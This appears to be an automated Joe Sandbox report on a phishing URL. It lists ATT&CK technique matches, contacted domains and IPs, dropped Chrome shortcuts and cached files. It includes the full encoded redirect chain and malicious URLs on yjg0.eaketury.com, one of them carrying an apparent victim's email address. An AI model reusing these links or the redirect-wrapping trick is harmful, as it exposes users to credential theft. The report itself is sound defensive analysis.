Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://us-west-2.protection.sophos.com/?d=google.co.za&u=aHR0cHM6Ly9nb29nbGUuY28uemEvYW1wL3Mvd3d3Lmdvb2dsZS5jb20lMkZ1cmwlM0ZzYSUzREQlMjZxJTNEaHR0cHMlM0ElMkYlMkZlbWFpbGluZy5taXJhYmF1ZC1hbS5jb20lMkZ0bC5waHAlMjUzRnAlMjUzRDVwMCUyRnQyJTJGcnMlMkYxZTYlMkZyeSUyRnJzJTJGJTJGaHR0cHMlM0ElMkYlMkZmaXJlYmFzZXN0b3JhZ2UuZ29vZ2xlYXBpcy5jb20lMjUyNTJGdjAlMjUyNTJGYiUyNTI1MkZteS1hd2Vzb21lLXByb2plY3QtaWQtMzU4ODkuYXBwc3BvdC5jb20lMjUyNTJGbyUyNTI1MkZzb3NmcmUuaHRtbCUyNTI1M0ZhbHQlMjUyNTNEbWVkaWElMjUyNTI2dG9rZW4lMjUyNTNENzBmZDlmZWMtZWM4Mi00YjQ1LTkwMmQtMmFhM2Q3NTgwYzNiJTI2dXN0JTNEMTcxNDEyMzE0MDAwMDAwMCUyNnVzZyUzREFPdlZhdzJ5SzhVRkpvWmVuUkRWdUJMLXNmY20lMjZobCUzRGVuJTI2c291cmNlJTNEZ21haWwjYTJ4MVkyRnpRR04wYlhOdmFHbHZMbU52YlE9PQ==&p=m&i=NjFjOWM1NjJmM2YxNmYxMDA2OTJjYWZj&t=THJkcUUxZW9PQzAvNFZ0aWxoalJFOStYQ0dWVXgvYjJ6aS82eTZoUDhJcz0=&h=276fada438bf49c2be0403c28d11d4f4&s=AVNPUEhUT0NFTkNSWVBUSVZ-gOCnEu8L0hbaTxie_PLqb02g0uIV3TDGiGYGiGwGbDIPB11limBksw9z8tTzOiKEbBHGOtpfybJD4FbJxpna6swSu6rycA6MG9n6CTc4aMLN4lGfbapv3cHB_2jaSF4	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
emailing.mirabaud-am.com	0%	Virustotal		Browse

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false		high
d2t07dpvw9bt1v.cloudfront.net	18.244.202.11	true	false		high
yjg0.eaketury.com	104.21.37.247	true	false		unknown
code.jquery.com	151.101.66.137	true	false		high
d2vgu95hoyrpkh.cloudfront.net	108.156.152.114	true	false		high
www.google.co.za	64.233.185.94	true	false		high
challenges.cloudflare.com	104.17.2.184	true	false		high
mirabaud-oempro.cobweb.host	83.166.140.224	true	false		unknown
google.co.za	142.251.15.94	true	false		high
www.google.com	142.250.9.99	true	false		high
us-west-2.protection.sophos.com	unknown	unknown	false		high
cdn.socket.io	unknown	unknown	false		high
emailing.mirabaud-am.com	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/7sl6k/0x4AAAAAAAXoUC7gmK_gV_CI/auto/normal	false		high
https://yjg0.eaketury.com/WnXlOu/#Mklucas@ctmsohio.com	true		unknown
https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.156.152.114	d2vgu95hoyrpkh.cloudfront.net	United States		16509	AMAZON-02US	false
104.21.37.247	yjg0.eaketury.com	United States		13335	CLOUDFLARENETUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
74.125.136.138	unknown	United States		15169	GOOGLEUS	false
172.217.215.147	unknown	United States		15169	GOOGLEUS	false
18.244.202.11	d2t07dpvw9bt1v.cloudfront.net	United States		16509	AMAZON-02US	false
104.17.3.184	unknown	United States		13335	CLOUDFLARENETUS	false
173.194.219.95	unknown	United States		15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
64.233.185.94	www.google.co.za	United States		15169	GOOGLEUS	false
83.166.140.224	mirabaud-oempro.cobweb.host	Switzerland		29222	INFOMANIAK-ASCH	false
151.101.66.137	code.jquery.com	United States		54113	FASTLYUS	false
142.251.15.94	google.co.za	United States		15169	GOOGLEUS	false
142.250.9.94	unknown	United States		15169	GOOGLEUS	false
74.125.136.100	unknown	United States		15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States		15169	GOOGLEUS	false
108.177.122.84	unknown	United States		15169	GOOGLEUS	false
142.250.9.99	www.google.com	United States		15169	GOOGLEUS	false
104.17.2.184	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
74.125.138.94	unknown	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431603
Start date and time:	2024-04-25 14:10:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://us-west-2.protection.sophos.com/?d=google.co.za&u=aHR0cHM6Ly9nb29nbGUuY28uemEvYW1wL3Mvd3d3Lmdvb2dsZS5jb20lMkZ1cmwlM0ZzYSUzREQlMjZxJTNEaHR0cHMlM0ElMkYlMkZlbWFpbGluZy5taXJhYmF1ZC1hbS5jb20lMkZ0bC5waHAlMjUzRnAlMjUzRDVwMCUyRnQyJTJGcnMlMkYxZTYlMkZyeSUyRnJzJTJGJTJGaHR0cHMlM0ElMkYlMkZmaXJlYmFzZXN0b3JhZ2UuZ29vZ2xlYXBpcy5jb20lMjUyNTJGdjAlMjUyNTJGYiUyNTI1MkZteS1hd2Vzb21lLXByb2plY3QtaWQtMzU4ODkuYXBwc3BvdC5jb20lMjUyNTJGbyUyNTI1MkZzb3NmcmUuaHRtbCUyNTI1M0ZhbHQlMjUyNTNEbWVkaWElMjUyNTI2dG9rZW4lMjUyNTNENzBmZDlmZWMtZWM4Mi00YjQ1LTkwMmQtMmFhM2Q3NTgwYzNiJTI2dXN0JTNEMTcxNDEyMzE0MDAwMDAwMCUyNnVzZyUzREFPdlZhdzJ5SzhVRkpvWmVuUkRWdUJMLXNmY20lMjZobCUzRGVuJTI2c291cmNlJTNEZ21haWwjYTJ4MVkyRnpRR04wYlhOdmFHbHZMbU52YlE9PQ==&p=m&i=NjFjOWM1NjJmM2YxNmYxMDA2OTJjYWZj&t=THJkcUUxZW9PQzAvNFZ0aWxoalJFOStYQ0dWVXgvYjJ6aS82eTZoUDhJcz0=&h=276fada438bf49c2be0403c28d11d4f4&s=AVNPUEhUT0NFTkNSWVBUSVZ-gOCnEu8L0hbaTxie_PLqb02g0uIV3TDGiGYGiGwGbDIPB11limBksw9z8tTzOiKEbBHGOtpfybJD4FbJxpna6swSu6rycA6MG9n6CTc4aMLN4lGfbapv3cHB_2jaSF4
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.phis.win@20/40@30/214

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.15.94, 74.125.136.138, 74.125.136.113, 74.125.136.139, 74.125.136.101, 74.125.136.100, 74.125.136.102, 108.177.122.84, 34.104.35.123, 173.194.219.95, 142.250.9.95, 108.177.122.95, 172.217.215.95, 142.250.105.95, 64.233.176.95, 172.253.124.95, 74.125.136.95, 74.125.138.95, 64.233.185.95, 142.251.15.95, 64.233.177.95
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com, firebasestorage.googleapis.com
Not all processes where analyzed, report is missing behavior information

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 11:10:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9792679827942825
Encrypted:	false
SSDEEP:
MD5:	DD8EA76D4B76E308FE2D309739FFD3F8
SHA1:	7A3B407199A0FD9E93ABBB001E2DF0BBC5F478F7
SHA-256:	7F1AA2C82FB6B9AA259CEA633746446E4B6F2971C12093B8EF32DD5ED2E9A97D
SHA-512:	B36D36724E7E72C24690A115644CF3315AB585928CD233C65D4B32F4E44C34CD5D665C1CDE65EA768A58A8BDDC46AE6033C7EB5664C9A5A3E0E9B87B4F3B1F0C
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....F.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIa....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XPa....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XPa....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XPa..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XQa...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........p.%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 11:10:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.9938886554628503
Encrypted:	false
SSDEEP:
MD5:	EBE7FEE99CD7935C0F6A074D6348F82F
SHA1:	7FAA7EB4D3F638B114E046CA489AD95520D719E5
SHA-256:	0027F49AE2364AC7C09FE2CE9A8642A63D9510664F877B3D1D9F3002CA77D804
SHA-512:	3326E9949C982D62366079E448D1093E2A467A88BA173658C259454D82927FE949822F23F0A78C2515F489D1176E508FB0C8E15B06B69383F99DDF6FBC2F7791
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....iu.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIa....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XPa....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XPa....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XPa..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XQa...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........p.%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.002781143897458
Encrypted:	false
SSDEEP:
MD5:	842D0F54C8B71213E67458F0F5ACD8DA
SHA1:	FAA8C2C512AF45B69D61E6184ABE529755C9A245
SHA-256:	85A3714E2212BD54DA027696C1016498E80B6EC5D04D028FC7BD7524F3A1F974
SHA-512:	C3F447E69E968D19C2F91A73F12060B72AC299AA0D693A3F938A058A0F7429688FB2EFA0AA798DAF015A5047BD9171755C1AD2AF90ED2967E5ECB5D146B620B1
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIa....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XPa....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XPa....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XPa..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........p.%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 11:10:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9938068155582807
Encrypted:	false
SSDEEP:
MD5:	B660D0CBEE7013AE8E74927FA3E09CCE
SHA1:	134D16BE8278CE533C15487B4D918AFA85BB6803
SHA-256:	094ED0268A510A8F09E922E9EE7368A01E3D887329521786B9D35ED942BA86A6
SHA-512:	669A2E35FA2363EBEBD4B0F1E1C2DDE86DFBC710EF717808CA51386B039D2D740C3C6C8F6AAA391729868509054E1920E4D6DBAB4C7736CDCAF0371E7918E501
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....'......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIa....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XPa....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XPa....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XPa..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XQa...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........p.%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 11:10:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9838283646772332
Encrypted:	false
SSDEEP:
MD5:	C600D92BEEF58B6A3DAEF80E105E2BD9
SHA1:	F79A36CC8F9008E9E2664BF0A88A20112BE1798E
SHA-256:	97C1DC884FA88069D72637238D5034C948E0E1876870561B8F26111CAB5EC907
SHA-512:	DFCB9170B8C895618D9B10220CC9F54D8AF2277D0A2DF19EE1F2D66EA5EF97AF4762954D5A144B3A4F6DACAA9A00CF4547555AFEA811FB5F0B93D0DB494DB4B7
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIa....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XPa....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XPa....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XPa..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XQa...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........p.%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 11:10:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.993328119542446
Encrypted:	false
SSDEEP:
MD5:	7E612AB110586846DD1810FEEEE66FEF
SHA1:	7B5E314E0B3839146B5E5EEDFB946C3AB490D487
SHA-256:	2FF78D93FBA66369AF168B3052FA99854E77D4AD4BE86F5615E26445C83EA1B6
SHA-512:	B5C0932BBEDB5B86A76DFC61DF828EBC90EE35F6BF488A8A929CB6B324B6FEEDB3CB2CEE9229D865026C9E0C827D1844D4EA3575BAAA4D429A3E7DBBD0D46588
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....>......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.XIa....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XPa....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XPa....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XPa..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XQa...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........p.%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 101

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1222), with no line terminators
Category:	downloaded
Size (bytes):	1222
Entropy (8bit):	5.818804287152988
Encrypted:	false
SSDEEP:
MD5:	463D838587C8B5873CB6E4E942B770C9
SHA1:	E69DCF383A6F3F51F123CA2D86F19FC4BE09E612
SHA-256:	1448EC1B3F30A554233BD280AA99A7EAF690D1098647E7DDDEA286C757884F9C
SHA-512:	F02DE64A37B90492D714CC7D132C49BF29CB5117CA945258BAF5B36D087A3A2AED165C6FF37D2ED4E4F10D7199AFB9C2B5E2555BA1BECA1A8D3AE133F4DF4B23
Malicious:	false
Reputation:	unknown
URL:	https://www.google.com/recaptcha/api.js
Preview:	/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]\|\|{},N='grecaptcha';var gr=w[N]=w[N]\|\|{};gr.ready=gr.ready\|\|function(f){(cfg['fns']=cfg['fns']\|\|[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']\|\|[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-0lJkOVHDy3ItYlCbUoEzThjP3hLhLYfEFPAkVOCx

Chrome Cache Entry: 104

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
Category:	downloaded
Size (bytes):	43596
Entropy (8bit):	7.9952701440723475
Encrypted:	true
SSDEEP:
MD5:	2A05E9E5572ABC320B2B7EA38A70DCC1
SHA1:	D5FA2A856D5632C2469E42436159375117EF3C35
SHA-256:	3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
SHA-512:	785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
Malicious:	false
Reputation:	unknown
URL:	https://yjg0.eaketury.com/89abylEqHPkSc9u4fsur9bsmcdoOcCYDCfyz73
Preview:	wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...\|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P..j..)..'.L......b..RQjII..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P......

Chrome Cache Entry: 105

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
Category:	downloaded
Size (bytes):	93276
Entropy (8bit):	7.997636438159837
Encrypted:	true
SSDEEP:
MD5:	BCD7983EA5AA57C55F6758B4977983CB
SHA1:	EF3A009E205229E07FB0EC8569E669B11C378EF1
SHA-256:	6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
SHA-512:	E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
Malicious:	false
Reputation:	unknown
URL:	https://yjg0.eaketury.com/cdwhdUWXDGTGLInJb56uHKakYYVcQIskl100
Preview:	wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.\|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X\|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~\|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.\|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. 